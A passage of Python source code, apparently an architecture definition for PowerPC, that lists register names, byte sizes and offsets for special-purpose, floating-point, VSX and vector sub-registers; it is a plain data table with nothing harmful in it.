Register('spr2cd', 4, 0x1b34),
Register('spr2ce', 4, 0x1b38),
Register('spr2cf', 4, 0x1b3c),
Register('spr2d0', 4, 0x1b40),
Register('spr2d1', 4, 0x1b44),
Register('spr2d2', 4, 0x1b48),
Register('spr2d3', 4, 0x1b4c),
Register('spr2d4', 4, 0x1b50),
Register('spr2d5', 4, 0x1b54),
Register('spr2d6', 4, 0x1b58),
Register('spr2d7', 4, 0x1b5c),
Register('spr2d8', 4, 0x1b60),
Register('spr2d9', 4, 0x1b64),
Register('spr2da', 4, 0x1b68),
Register('spr2db', 4, 0x1b6c),
Register('spr2dc', 4, 0x1b70),
Register('spr2dd', 4, 0x1b74),
Register('spr2de', 4, 0x1b78),
Register('spr2df', 4, 0x1b7c),
Register('spr2e0', 4, 0x1b80),
Register('spr2e1', 4, 0x1b84),
Register('spr2e2', 4, 0x1b88),
Register('spr2e3', 4, 0x1b8c),
Register('spr2e4', 4, 0x1b90),
Register('spr2e5', 4, 0x1b94),
Register('spr2e6', 4, 0x1b98),
Register('spr2e7', 4, 0x1b9c),
Register('spr2e8', 4, 0x1ba0),
Register('spr2e9', 4, 0x1ba4),
Register('spr2ea', 4, 0x1ba8),
Register('spr2eb', 4, 0x1bac),
Register('spr2ec', 4, 0x1bb0),
Register('spr2ed', 4, 0x1bb4),
Register('spr2ee', 4, 0x1bb8),
Register('spr2ef', 4, 0x1bbc),
Register('spr2f0', 4, 0x1bc0),
Register('spr2f1', 4, 0x1bc4),
Register('spr2f2', 4, 0x1bc8),
Register('spr2f3', 4, 0x1bcc),
Register('spr2f4', 4, 0x1bd0),
Register('spr2f5', 4, 0x1bd4),
Register('spr2f6', 4, 0x1bd8),
Register('spr2f7', 4, 0x1bdc),
Register('spr2f8', 4, 0x1be0),
Register('spr2f9', 4, 0x1be4),
Register('spr2fa', 4, 0x1be8),
Register('spr2fb', 4, 0x1bec),
Register('spr2fc', 4, 0x1bf0),
Register('spr2fd', 4, 0x1bf4),
Register('spr2fe', 4, 0x1bf8),
Register('spr2ff', 4, 0x1bfc),
Register('spr300', 4, 0x1c00),
Register('spr301', 4, 0x1c04),
Register('spr302', 4, 0x1c08),
Register('spr303', 4, 0x1c0c),
Register('spr304', 4, 0x1c10),
Register('spr305', 4, 0x1c14),
Register('spr306', 4, 0x1c18),
Register('spr307', 4, 0x1c1c),
Register('spr308', 4, 0x1c20),
Register('spr309', 4, 0x1c24),
Register('spr30a', 4, 0x1c28),
Register('spr30b', 4, 0x1c2c),
Register('spr30c', 4, 0x1c30),
Register('spr30d', 4, 0x1c34),
Register('spr30e', 4, 0x1c38),
Register('spr30f', 4, 0x1c3c),
Register('spr310', 4, 0x1c40),
Register('spr311', 4, 0x1c44),
Register('spr312', 4, 0x1c48),
Register('spr313', 4, 0x1c4c),
Register('spr314', 4, 0x1c50),
Register('spr315', 4, 0x1c54),
Register('spr316', 4, 0x1c58),
Register('spr317', 4, 0x1c5c),
Register('spr318', 4, 0x1c60),
Register('spr319', 4, 0x1c64),
Register('spr31a', 4, 0x1c68),
Register('spr31b', 4, 0x1c6c),
Register('spr31c', 4, 0x1c70),
Register('spr31d', 4, 0x1c74),
Register('spr31e', 4, 0x1c78),
Register('spr31f', 4, 0x1c7c),
Register('spr320', 4, 0x1c80),
Register('spr321', 4, 0x1c84),
Register('spr322', 4, 0x1c88),
Register('spr323', 4, 0x1c8c),
Register('spr324', 4, 0x1c90),
Register('spr325', 4, 0x1c94),
Register('spr326', 4, 0x1c98),
Register('spr327', 4, 0x1c9c),
Register('spr328', 4, 0x1ca0),
Register('spr329', 4, 0x1ca4),
Register('spr32a', 4, 0x1ca8),
Register('spr32b', 4, 0x1cac),
Register('spr32c', 4, 0x1cb0),
Register('spr32d', 4, 0x1cb4),
Register('spr32e', 4, 0x1cb8),
Register('tar', 4, 0x1cbc),
Register('spr330', 4, 0x1cc0),
Register('spr331', 4, 0x1cc4),
Register('spr332', 4, 0x1cc8),
Register('spr333', 4, 0x1ccc),
Register('spr334', 4, 0x1cd0),
Register('spr335', 4, 0x1cd4),
Register('spr336', 4, 0x1cd8),
Register('spr337', 4, 0x1cdc),
Register('spr338', 4, 0x1ce0),
Register('spr339', 4, 0x1ce4),
Register('spr33a', 4, 0x1ce8),
Register('spr33b', 4, 0x1cec),
Register('spr33c', 4, 0x1cf0),
Register('spr33d', 4, 0x1cf4),
Register('spr33e', 4, 0x1cf8),
Register('spr33f', 4, 0x1cfc),
Register('spr340', 4, 0x1d00),
Register('spr341', 4, 0x1d04),
Register('spr342', 4, 0x1d08),
Register('spr343', 4, 0x1d0c),
Register('spr344', 4, 0x1d10),
Register('spr345', 4, 0x1d14),
Register('spr346', 4, 0x1d18),
Register('spr347', 4, 0x1d1c),
Register('spr348', 4, 0x1d20),
Register('spr349', 4, 0x1d24),
Register('spr34a', 4, 0x1d28),
Register('spr34b', 4, 0x1d2c),
Register('spr34c', 4, 0x1d30),
Register('spr34d', 4, 0x1d34),
Register('spr34e', 4, 0x1d38),
Register('spr34f', 4, 0x1d3c),
Register('spr350', 4, 0x1d40),
Register('spr351', 4, 0x1d44),
Register('spr352', 4, 0x1d48),
Register('spr353', 4, 0x1d4c),
Register('spr354', 4, 0x1d50),
Register('spr355', 4, 0x1d54),
Register('spr356', 4, 0x1d58),
Register('spr357', 4, 0x1d5c),
Register('spr358', 4, 0x1d60),
Register('spr359', 4, 0x1d64),
Register('spr35a', 4, 0x1d68),
Register('spr35b', 4, 0x1d6c),
Register('spr35c', 4, 0x1d70),
Register('spr35d', 4, 0x1d74),
Register('spr35e', 4, 0x1d78),
Register('spr35f', 4, 0x1d7c),
Register('spr360', 4, 0x1d80),
Register('spr361', 4, 0x1d84),
Register('spr362', 4, 0x1d88),
Register('spr363', 4, 0x1d8c),
Register('spr364', 4, 0x1d90),
Register('spr365', 4, 0x1d94),
Register('spr366', 4, 0x1d98),
Register('spr367', 4, 0x1d9c),
Register('spr368', 4, 0x1da0),
Register('spr369', 4, 0x1da4),
Register('spr36a', 4, 0x1da8),
Register('spr36b', 4, 0x1dac),
Register('spr36c', 4, 0x1db0),
Register('spr36d', 4, 0x1db4),
Register('spr36e', 4, 0x1db8),
Register('spr36f', 4, 0x1dbc),
Register('spr370', 4, 0x1dc0),
Register('spr371', 4, 0x1dc4),
Register('spr372', 4, 0x1dc8),
Register('spr373', 4, 0x1dcc),
Register('spr374', 4, 0x1dd0),
Register('spr375', 4, 0x1dd4),
Register('spr376', 4, 0x1dd8),
Register('spr377', 4, 0x1ddc),
Register('spr378', 4, 0x1de0),
Register('spr379', 4, 0x1de4),
Register('spr37a', 4, 0x1de8),
Register('spr37b', 4, 0x1dec),
Register('spr37c', 4, 0x1df0),
Register('spr37d', 4, 0x1df4),
Register('spr37e', 4, 0x1df8),
Register('spr37f', 4, 0x1dfc),
Register('spr380', 4, 0x1e00),
Register('spr381', 4, 0x1e04),
Register('spr382', 4, 0x1e08),
Register('spr383', 4, 0x1e0c),
Register('spr384', 4, 0x1e10),
Register('spr385', 4, 0x1e14),
Register('spr386', 4, 0x1e18),
Register('spr387', 4, 0x1e1c),
Register('spr388', 4, 0x1e20),
Register('spr389', 4, 0x1e24),
Register('spr38a', 4, 0x1e28),
Register('spr38b', 4, 0x1e2c),
Register('spr38c', 4, 0x1e30),
Register('spr38d', 4, 0x1e34),
Register('spr38e', 4, 0x1e38),
Register('spr38f', 4, 0x1e3c),
Register('spr390', 4, 0x1e40),
Register('spr391', 4, 0x1e44),
Register('spr392', 4, 0x1e48),
Register('spr393', 4, 0x1e4c),
Register('spr394', 4, 0x1e50),
Register('spr395', 4, 0x1e54),
Register('spr396', 4, 0x1e58),
Register('spr397', 4, 0x1e5c),
Register('spr398', 4, 0x1e60),
Register('spr399', 4, 0x1e64),
Register('spr39a', 4, 0x1e68),
Register('spr39b', 4, 0x1e6c),
Register('spr39c', 4, 0x1e70),
Register('spr39d', 4, 0x1e74),
Register('spr39e', 4, 0x1e78),
Register('spr39f', 4, 0x1e7c),
Register('spr3a0', 4, 0x1e80),
Register('spr3a1', 4, 0x1e84),
Register('spr3a2', 4, 0x1e88),
Register('spr3a3', 4, 0x1e8c),
Register('spr3a4', 4, 0x1e90),
Register('spr3a5', 4, 0x1e94),
Register('spr3a6', 4, 0x1e98),
Register('spr3a7', 4, 0x1e9c),
Register('spr3a8', 4, 0x1ea0),
Register('spr3a9', 4, 0x1ea4),
Register('spr3aa', 4, 0x1ea8),
Register('spr3ab', 4, 0x1eac),
Register('spr3ac', 4, 0x1eb0),
Register('spr3ad', 4, 0x1eb4),
Register('spr3ae', 4, 0x1eb8),
Register('spr3af', 4, 0x1ebc),
Register('spr3b0', 4, 0x1ec0),
Register('spr3b1', 4, 0x1ec4),
Register('spr3b2', 4, 0x1ec8),
Register('spr3b3', 4, 0x1ecc),
Register('spr3b4', 4, 0x1ed0),
Register('spr3b5', 4, 0x1ed4),
Register('spr3b6', 4, 0x1ed8),
Register('spr3b7', 4, 0x1edc),
Register('spr3b8', 4, 0x1ee0),
Register('spr3b9', 4, 0x1ee4),
Register('spr3ba', 4, 0x1ee8),
Register('spr3bb', 4, 0x1eec),
Register('spr3bc', 4, 0x1ef0),
Register('spr3bd', 4, 0x1ef4),
Register('spr3be', 4, 0x1ef8),
Register('spr3bf', 4, 0x1efc),
Register('spr3c0', 4, 0x1f00),
Register('spr3c1', 4, 0x1f04),
Register('spr3c2', 4, 0x1f08),
Register('spr3c3', 4, 0x1f0c),
Register('spr3c4', 4, 0x1f10),
Register('spr3c5', 4, 0x1f14),
Register('spr3c6', 4, 0x1f18),
Register('spr3c7', 4, 0x1f1c),
Register('spr3c8', 4, 0x1f20),
Register('spr3c9', 4, 0x1f24),
Register('spr3ca', 4, 0x1f28),
Register('spr3cb', 4, 0x1f2c),
Register('spr3cc', 4, 0x1f30),
Register('spr3cd', 4, 0x1f34),
Register('spr3ce', 4, 0x1f38),
Register('spr3cf', 4, 0x1f3c),
Register('spr3d0', 4, 0x1f40),
Register('spr3d1', 4, 0x1f44),
Register('spr3d2', 4, 0x1f48),
Register('spr3d3', 4, 0x1f4c),
Register('spr3d4', 4, 0x1f50),
Register('spr3d5', 4, 0x1f54),
Register('spr3d6', 4, 0x1f58),
Register('spr3d7', 4, 0x1f5c),
Register('spr3d8', 4, 0x1f60),
Register('spr3d9', 4, 0x1f64),
Register('spr3da', 4, 0x1f68),
Register('spr3db', 4, 0x1f6c),
Register('spr3dc', 4, 0x1f70),
Register('spr3dd', 4, 0x1f74),
Register('spr3de', 4, 0x1f78),
Register('spr3df', 4, 0x1f7c),
Register('spr3e0', 4, 0x1f80),
Register('spr3e1', 4, 0x1f84),
Register('spr3e2', 4, 0x1f88),
Register('spr3e3', 4, 0x1f8c),
Register('spr3e4', 4, 0x1f90),
Register('spr3e5', 4, 0x1f94),
Register('spr3e6', 4, 0x1f98),
Register('spr3e7', 4, 0x1f9c),
Register('spr3e8', 4, 0x1fa0),
Register('spr3e9', 4, 0x1fa4),
Register('spr3ea', 4, 0x1fa8),
Register('spr3eb', 4, 0x1fac),
Register('spr3ec', 4, 0x1fb0),
Register('spr3ed', 4, 0x1fb4),
Register('spr3ee', 4, 0x1fb8),
Register('spr3ef', 4, 0x1fbc),
Register('spr3f0', 4, 0x1fc0),
Register('spr3f1', 4, 0x1fc4),
Register('spr3f2', 4, 0x1fc8),
Register('spr3f3', 4, 0x1fcc),
Register('spr3f4', 4, 0x1fd0),
Register('spr3f5', 4, 0x1fd4),
Register('spr3f6', 4, 0x1fd8),
Register('spr3f7', 4, 0x1fdc),
Register('spr3f8', 4, 0x1fe0),
Register('spr3f9', 4, 0x1fe4),
Register('spr3fa', 4, 0x1fe8),
Register('spr3fb', 4, 0x1fec),
Register('spr3fc', 4, 0x1ff0),
Register('spr3fd', 4, 0x1ff4),
Register('spr3fe', 4, 0x1ff8),
Register('spr3ff', 4, 0x1ffc),
Register('vs0', 16, 0x4000),
Register('f0', 8, 0x4008),
Register('vs1', 16, 0x4010),
Register('f1', 8, 0x4018),
Register('vs2', 16, 0x4020),
Register('f2', 8, 0x4028),
Register('vs3', 16, 0x4030),
Register('f3', 8, 0x4038),
Register('vs4', 16, 0x4040),
Register('f4', 8, 0x4048),
Register('vs5', 16, 0x4050),
Register('f5', 8, 0x4058),
Register('vs6', 16, 0x4060),
Register('f6', 8, 0x4068),
Register('vs7', 16, 0x4070),
Register('f7', 8, 0x4078),
Register('vs8', 16, 0x4080),
Register('f8', 8, 0x4088),
Register('vs9', 16, 0x4090),
Register('f9', 8, 0x4098),
Register('vs10', 16, 0x40a0),
Register('f10', 8, 0x40a8),
Register('vs11', 16, 0x40b0),
Register('f11', 8, 0x40b8),
Register('vs12', 16, 0x40c0),
Register('f12', 8, 0x40c8),
Register('vs13', 16, 0x40d0),
Register('f13', 8, 0x40d8),
Register('vs14', 16, 0x40e0),
Register('f14', 8, 0x40e8),
Register('vs15', 16, 0x40f0),
Register('f15', 8, 0x40f8),
Register('vs16', 16, 0x4100),
Register('f16', 8, 0x4108),
Register('vs17', 16, 0x4110),
Register('f17', 8, 0x4118),
Register('vs18', 16, 0x4120),
Register('f18', 8, 0x4128),
Register('vs19', 16, 0x4130),
Register('f19', 8, 0x4138),
Register('vs20', 16, 0x4140),
Register('f20', 8, 0x4148),
Register('vs21', 16, 0x4150),
Register('f21', 8, 0x4158),
Register('vs22', 16, 0x4160),
Register('f22', 8, 0x4168),
Register('vs23', 16, 0x4170),
Register('f23', 8, 0x4178),
Register('vs24', 16, 0x4180),
Register('f24', 8, 0x4188),
Register('vs25', 16, 0x4190),
Register('f25', 8, 0x4198),
Register('vs26', 16, 0x41a0),
Register('f26', 8, 0x41a8),
Register('vs27', 16, 0x41b0),
Register('f27', 8, 0x41b8),
Register('vs28', 16, 0x41c0),
Register('f28', 8, 0x41c8),
Register('vs29', 16, 0x41d0),
Register('f29', 8, 0x41d8),
Register('vs30', 16, 0x41e0),
Register('f30', 8, 0x41e8),
Register('vs31', 16, 0x41f0),
Register('f31', 8, 0x41f8),
Register('vs32', 16, 0x4200),
Register('vr0_64_1', 8, 0x4200),
Register('vr0_32_3', 4, 0x4200),
Register('vr0_16_7', 2, 0x4200),
Register('vr0_8_15', 1, 0x4200),
Register('vr0_8_14', 1, 0x4201),
Register('vr0_16_6', 2, 0x4202),
Register('vr0_8_13', 1, 0x4202),
Register('vr0_8_12', 1, 0x4203),
Register('vr0_32_2', 4, 0x4204),
Register('vr0_16_5', 2, 0x4204),
Register('vr0_8_11', 1, 0x4204),
Register('vr0_8_10', 1, 0x4205),
Register('vr0_16_4', 2, 0x4206),
Register('vr0_8_9', 1, 0x4206),
Register('vr0_8_8', 1, 0x4207),
Register('vr0_64_0', 8, 0x4208),
Register('vr0_32_1', 4, 0x4208),
Register('vr0_16_3', 2, 0x4208),
Register('vr0_8_7', 1, 0x4208),
Register('vr0_8_6', 1, 0x4209),
Register('vr0_16_2', 2, 0x420a),
Register('vr0_8_5', 1, 0x420a),
Register('vr0_8_4', 1, 0x420b),
Register('vr0_32_0', 4, 0x420c),
Register('vr0_16_1', 2, 0x420c),
Register('vr0_8_3', 1, 0x420c),
Register('vr0_8_2', 1, 0x420d),
Register('vr0_16_0', 2, 0x420e),
Register('vr0_8_1', 1, 0x420e),
Register('vr0_8_0', 1, 0x420f),
Register('vs33', 16, 0x4210),
Register('vr1_64_1', 8, 0x4210),
Register('vr1_32_3', 4, 0x4210),
Register('vr1_16_7', 2, 0x4210),
Register('vr1_8_15', 1, 0x4210),
Register('vr1_8_14', 1, 0x4211),
Register('vr1_16_6', 2, 0x4212),
Register('vr1_8_13', 1, 0x4212),
Register('vr1_8_12', 1, 0x4213),
Register('vr1_32_2', 4, 0x4214),
Register('vr1_16_5', 2, 0x4214),
Register('vr1_8_11', 1, 0x4214),
Register('vr1_8_10', 1, 0x4215),
Register('vr1_16_4', 2, 0x4216),
Register('vr1_8_9', 1, 0x4216),
Register('vr1_8_8', 1, 0x4217),
Register('vr1_64_0', 8, 0x4218),
Register('vr1_32_1', 4, 0x4218),
Register('vr1_16_3', 2, 0x4218),
Register('vr1_8_7', 1, 0x4218),
Register('vr1_8_6', 1, 0x4219),
Register('vr1_16_2', 2, 0x421a),
Register('vr1_8_5', 1, 0x421a),
Register('vr1_8_4', 1, 0x421b),
Register('vr1_32_0', 4, 0x421c),
Register('vr1_16_1', 2, 0x421c),
Register('vr1_8_3', 1, 0x421c),
Register('vr1_8_2', 1, 0x421d),
Register('vr1_16_0', 2, 0x421e),
Register('vr1_8_1', 1, 0x421e),
Register('vr1_8_0', 1, 0x421f),
Register('vs34', 16, 0x4220),
Register('vr2_64_1', 8, 0x4220),
Register('vr2_32_3', 4, 0x4220),
Register('vr2_16_7', 2, 0x4220),
Register('vr2_8_15', 1, 0x4220),
Register('vr2_8_14', 1, 0x4221),
Register('vr2_16_6', 2, 0x4222),
Register('vr2_8_13', 1, 0x4222),
Register('vr2_8_12', 1, 0x4223),
Register('vr2_32_2', 4, 0x4224),
Register('vr2_16_5', 2, 0x4224),
Register('vr2_8_11', 1, 0x4224),
Register('vr2_8_10', 1, 0x4225),
Register('vr2_16_4', 2, 0x4226),
Register('vr2_8_9', 1, 0x4226),
Register('vr2_8_8', 1, 0x4227),
Register('vr2_64_0', 8, 0x4228),
Register('vr2_32_1', 4, 0x4228),
Register('vr2_16_3', 2, 0x4228),
Register('vr2_8_7', 1, 0x4228),
Register('vr2_8_6', 1, 0x4229),
Register('vr2_16_2', 2, 0x422a),
Register('vr2_8_5', 1, 0x422a),
Register('vr2_8_4', 1, 0x422b),
Register('vr2_32_0', 4, 0x422c),
Register('vr2_16_1', 2, 0x422c),
Register('vr2_8_3', 1, 0x422c),
Register('vr2_8_2', 1, 0x422d),
Register('vr2_16_0', 2, 0x422e),
Register('vr2_8_1', 1, 0x422e),
Register('vr2_8_0', 1, 0x422f),
Register('vs35', 16, 0x4230),
Register('vr3_64_1', 8, 0x4230),
Register('vr3_32_3', 4, 0x4230),
Register('vr3_16_7', 2, 0x4230),
Register('vr3_8_15', 1, 0x4230),
Register('vr3_8_14', 1, 0x4231),
Register('vr3_16_6', 2, 0x4232),
Register('vr3_8_13', 1, 0x4232),
Register('vr3_8_12', 1, 0x4233),
Register('vr3_32_2', 4, 0x4234),
Register('vr3_16_5', 2, 0x4234),
Register('vr3_8_11', 1, 0x4234),
Register('vr3_8_10', 1, 0x4235),
Register('vr3_16_4', 2, 0x4236),
Register('vr3_8_9', 1, 0x4236),
Register('vr3_8_8', 1, 0x4237),
Register('vr3_64_0', 8, 0x4238),
Register('vr3_32_1', 4, 0x4238),
Register('vr3_16_3', 2, 0x4238),
Register('vr3_8_7', 1, 0x4238),
Register('vr3_8_6', 1, 0x4239),
Register('vr3_16_2', 2, 0x423a),
Register('vr3_8_5', 1, 0x423a),
Register('vr3_8_4', 1, 0x423b),
Register('vr3_32_0', 4, 0x423c),
Register('vr3_16_1', 2, 0x423c),
Register('vr3_8_3', 1, 0x423c),
Register('vr3_8_2', 1, 0x423d),
Register('vr3_16_0', 2, 0x423e),
Register('vr3_8_1', 1, 0x423e),
Register('vr3_8_0', 1, 0x423f),
Register('vs36', 16, 0x4240),
Register('vr4_64_1', 8, 0x4240),
Register('vr4_32_3', 4, 0x4240),
Register('vr4_16_7', 2, 0x4240),
Register('vr4_8_15', 1, 0x4240),
Register('vr4_8_14', 1, 0x4241),
Register('vr4_16_6', 2, 0x4242),
Register('vr4_8_13', 1, 0x4242),
Register('vr4_8_12', 1, 0x4243),
Register('vr4_32_2', 4, 0x4244),
Register('vr4_16_5', 2, 0x4244),
Register('vr4_8_11', 1, 0x4244),
Register('vr4_8_10', 1, 0x4245),
Register('vr4_16_4', 2, 0x4246),
Register('vr4_8_9', 1, 0x4246),
Register('vr4_8_8', 1, 0x4247),
Register('vr4_64_0', 8, 0x4248),
Register('vr4_32_1', 4, 0x4248),
Register('vr4_16_3', 2, 0x4248),
Register('vr4_8_7', 1, 0x4248),
Register('vr4_8_6', 1, 0x4249),
Register('vr4_16_2', 2, 0x424a),
Register('vr4_8_5', 1, 0x424a),
Register('vr4_8_4', 1, 0x424b),
Register('vr4_32_0', 4, 0x424c),
Register('vr4_16_1', 2, 0x424c),
Register('vr4_8_3', 1, 0x424c),
Register('vr4_8_2', 1, 0x424d),
Register('vr4_16_0', 2, 0x424e),
Register('vr4_8_1', 1, 0x424e),
Register('vr4_8_0', 1, 0x424f),
Register('vs37', 16, 0x4250),
Register('vr5_64_1', 8, 0x4250),
Register('vr5_32_3', 4, 0x4250),
Register('vr5_16_7', 2, 0x4250),
Register('vr5_8_15', 1, 0x4250),
Register('vr5_8_14', 1, 0x4251),
Register('vr5_16_6', 2, 0x4252),
Register('vr5_8_13', 1, 0x4252),
Register('vr5_8_12', 1, 0x4253),
Register('vr5_32_2', 4, 0x4254),
Register('vr5_16_5', 2, 0x4254),
Register('vr5_8_11', 1, 0x4254),
Register('vr5_8_10', 1, 0x4255),
Register('vr5_16_4', 2, 0x4256),
Register('vr5_8_9', 1, 0x4256),
Register('vr5_8_8', 1, 0x4257),
Register('vr5_64_0', 8, 0x4258),
Register('vr5_32_1', 4, 0x4258),
Register('vr5_16_3', 2, 0x4258),
Register('vr5_8_7', 1, 0x4258),
Register('vr5_8_6', 1, 0x4259),
Register('vr5_16_2', 2, 0x425a),
Register('vr5_8_5', 1, 0x425a),
Register('vr5_8_4', 1, 0x425b),
Register('vr5_32_0', 4, 0x425c),
Register('vr5_16_1', 2, 0x425c),
Register('vr5_8_3', 1, 0x425c),
Register('vr5_8_2', 1, 0x425d),
Register('vr5_16_0', 2, 0x425e),
Register('vr5_8_1', 1, 0x425e),
Register('vr5_8_0', 1, 0x425f),
Register('vs38', 16, 0x4260),
Register('vr6_64_1', 8, 0x4260),
Register('vr6_32_3', 4, 0x4260),
Register('vr6_16_7', 2, 0x4260),
Register('vr6_8_15', 1, 0x4260),
Register('vr6_8_14', 1, 0x4261),
Register('vr6_16_6', 2, 0x4262),
Register('vr6_8_13', 1, 0x4262),
Register('vr6_8_12', 1, 0x4263),
Register('vr6_32_2', 4, 0x4264),
Register('vr6_16_5', 2, 0x4264),
Register('vr6_8_11', 1, 0x4264),
Register('vr6_8_10', 1, 0x4265),
Register('vr6_16_4', 2, 0x4266),
Register('vr6_8_9', 1, 0x4266),
Register('vr6_8_8', 1, 0x4267),
Register('vr6_64_0', 8, 0x4268),
Register('vr6_32_1', 4, 0x4268),
Register('vr6_16_3', 2, 0x4268),
Register('vr6_8_7', 1, 0x4268),
Register('vr6_8_6', 1, 0x4269),
Register('vr6_16_2', 2, 0x426a),
Register('vr6_8_5', 1, 0x426a),
Register('vr6_8_4', 1, 0x426b),
Register('vr6_32_0', 4, 0x426c),
Register('vr6_16_1', 2, 0x426c),
Register('vr6_8_3', 1, 0x426c),
Register('vr6_8_2', 1, 0x426d),
Register('vr6_16_0', 2, 0x426e),
Register('vr6_8_1', 1, 0x426e),
Register('vr6_8_0', 1, 0x426f),
Register('vs39', 16, 0x4270),
Register('vr7_64_1', 8, 0x4270),
Register('vr7_32_3', 4, 0x4270),
Register('vr7_16_7', 2, 0x4270),
Register('vr7_8_15', 1, 0x4270),
Register('vr7_8_14', 1, 0x4271),
Register('vr7_16_6', 2, 0x4272),
Register('vr7_8_13', 1, 0x4272),
Register('vr7_8_12', 1, 0x4273),
Register('vr7_32_2', 4, 0x4274),
Register('vr7_16_5', 2, 0x4274),
Register('vr7_8_11', 1, 0x4274),
Register('vr7_8_10', 1, 0x4275),
Register('vr7_16_4', 2, 0x4276),
Register('vr7_8_9', 1, 0x4276),
Register('vr7_8_8', 1, 0x4277),
Register('vr7_64_0', 8, 0x4278),
Register('vr7_32_1', 4, 0x4278),
Register('vr7_16_3', 2, 0x4278),
Register('vr7_8_7', 1, 0x4278),
Register('vr7_8_6', 1, 0x4279),
Register('vr7_16_2', 2, 0x427a),
Register('vr7_8_5', 1, 0x427a),
Register('vr7_8_4', 1, 0x427b),
Register('vr7_32_0', 4, 0x427c),
Register('vr7_16_1', 2, 0x427c),
Register('vr7_8_3', 1, 0x427c),
Register('vr7_8_2', 1, 0x427d),
Register('vr7_16_0', 2, 0x427e),
Register('vr7_8_1', 1, 0x427e),
Register('vr7_8_0', 1, 0x427f),
Register('vs40', 16, 0x4280),
Register('vr8_64_1', 8, 0x4280),
Register('vr8_32_3', 4, 0x4280),
Register('vr8_16_7', 2, 0x4280),
Register('vr8_8_15', 1, 0x4280),
Register('vr8_8_14', 1, 0x4281),
Register('vr8_16_6', 2, 0x4282),
Register('vr8_8_13', 1, 0x4282),
Register('vr8_8_12', 1, 0x4283),
Register('vr8_32_2', 4, 0x4284),
Register('vr8_16_5', 2, 0x4284),
Register('vr8_8_11', 1, 0x4284),
Register('vr8_8_10', 1, 0x4285),
Register('vr8_16_4', 2, 0x4286),
Register('vr8_8_9', 1, 0x4286),
Register('vr8_8_8', 1, 0x4287),
Register('vr8_64_0', 8, 0x4288),
Register('vr8_32_1', 4, 0x4288),
Register('vr8_16_3', 2, 0x4288),
Register('vr8_8_7', 1, 0x4288),
Register('vr8_8_6', 1, 0x4289),
Register('vr8_16_2', 2, 0x428a),
Register('vr8_8_5', 1, 0x428a),
Register('vr8_8_4', 1, 0x428b),
Register('vr8_32_0', 4, 0x428c),
Register('vr8_16_1', 2, 0x428c),
Register('vr8_8_3', 1, 0x428c),
Register('vr8_8_2', 1, 0x428d),
Register('vr8_16_0', 2, 0x428e),
Register('vr8_8_1', 1, 0x428e),
Register('vr8_8_0', 1, 0x428f),
Register('vs41', 16, 0x4290),
Register('vr9_64_1', 8, 0x4290),
Register('vr9_32_3', 4, 0x4290),
Register('vr9_16_7', 2, 0x4290),
Register('vr9_8_15', 1, 0x4290),
Register('vr9_8_14', 1, 0x4291),
Register('vr9_16_6', 2, 0x4292),
Register('vr9_8_13', 1, 0x4292),
Register('vr9_8_12', 1, 0x4293),
Register('vr9_32_2', 4, 0x4294),
Register('vr9_16_5', 2, 0x4294),
Register('vr9_8_11', 1, 0x4294),
Register('vr9_8_10', 1, 0x4295),
Register('vr9_16_4', 2, 0x4296),
Register('vr9_8_9', 1, 0x4296),
Register('vr9_8_8', 1, 0x4297),
Register('vr9_64_0', 8, 0x4298),
Register('vr9_32_1', 4, 0x4298),
Register('vr9_16_3', 2, 0x4298),
Register('vr9_8_7', 1, 0x4298),
Register('vr9_8_6', 1, 0x4299),
Register('vr9_16_2', 2, 0x429a),
Register('vr9_8_5', 1, 0x429a),
Register('vr9_8_4', 1, 0x429b),
Register('vr9_32_0', 4, 0x429c),
Register('vr9_16_1', 2, 0x429c),
Register('vr9_8_3', 1, 0x429c),
Register('vr9_8_2', 1, 0x429d),
Register('vr9_16_0', 2, 0x429e),
Register('vr9_8_1', 1, 0x429e),
Register('vr9_8_0', 1, 0x429f),
Register('vs42', 16, 0x42a0),
Register('vr10_64_1', 8, 0x42a0),
Register('vr10_32_3', 4, 0x42a0),
Register('vr10_16_7', 2, 0x42a0),
Register('vr10_8_15', 1, 0x42a0),
Register('vr10_8_14', 1, 0x42a1),
Register('vr10_16_6', 2, 0x42a2),
Register('vr10_8_13', 1, 0x42a2),
Register('vr10_8_12', 1, 0x42a3),
Register('vr10_32_2', 4, 0x42a4),
Register('vr10_16_5', 2, 0x42a4),
Register('vr10_8_11', 1, 0x42a4),
Register('vr10_8_10', 1, 0x42a5),
Register('vr10_16_4', 2, 0x42a6),
Register('vr10_8_9', 1, 0x42a6),
Register('vr10_8_8', 1, 0x42a7),
Register('vr10_64_0', 8, 0x42a8),
Register('vr10_32_1', 4, 0x42a8),
Register('vr10_16_3', 2, 0x42a8),
Register('vr10_8_7', 1, 0x42a8),
Register('vr10_8_6', 1, 0x42a9),
Register('vr10_16_2', 2, 0x42aa),
Register('vr10_8_5', 1, 0x42aa),
Register('vr10_8_4', 1, 0x42ab),
Register('vr10_32_0', 4, 0x42ac),
Register('vr10_16_1', 2, 0x42ac),
Register('vr10_8_3', 1, 0x42ac),
Register('vr10_8_2', 1, 0x42ad),
Register('vr10_16_0', 2, 0x42ae),
Register('vr10_8_1', 1, 0x42ae),
Register('vr10_8_0', 1, 0x42af),
Register('vs43', 16, 0x42b0),
Register('vr11_64_1', 8, 0x42b0),
Register('vr11_32_3', 4, 0x42b0),
Register('vr11_16_7', 2, 0x42b0),
Register('vr11_8_15', 1, 0x42b0),
Register('vr11_8_14', 1, 0x42b1),
Register('vr11_16_6', 2, 0x42b2),
Register('vr11_8_13', 1, 0x42b2),
Register('vr11_8_12', 1, 0x42b3),
Register('vr11_32_2', 4, 0x42b4),
Register('vr11_16_5', 2, 0x42b4),
Register('vr11_8_11', 1, 0x42b4),
Register('vr11_8_10', 1, 0x42b5),
Register('vr11_16_4', 2, 0x42b6),
Register('vr11_8_9', 1, 0x42b6),
Register('vr11_8_8', 1, 0x42b7),
Register('vr11_64_0', 8, 0x42b8),
Register('vr11_32_1', 4, 0x42b8),
Register('vr11_16_3', 2, 0x42b8),
Register('vr11_8_7', 1, 0x42b8),
Register('vr11_8_6', 1, 0x42b9),
Register('vr11_16_2', 2, 0x42ba),
Register('vr11_8_5', 1, 0x42ba),
Register('vr11_8_4', 1, 0x42bb),
Register('vr11_32_0', 4, 0x42bc),
Register('vr11_16_1', 2, 0x42bc),
Register('vr11_8_3', 1, 0x42bc),
Register('vr11_8_2', 1, 0x42bd),
Register('vr11_16_0', 2, 0x42be),
Register('vr11_8_1', 1, 0x42be),
Register('vr11_8_0', 1, 0x42bf),
Register('vs44', 16, 0x42c0),
Register('vr12_64_1', 8, 0x42c0),
Register('vr12_32_3', 4, 0x42c0),
Register('vr12_16_7', 2, 0x42c0),
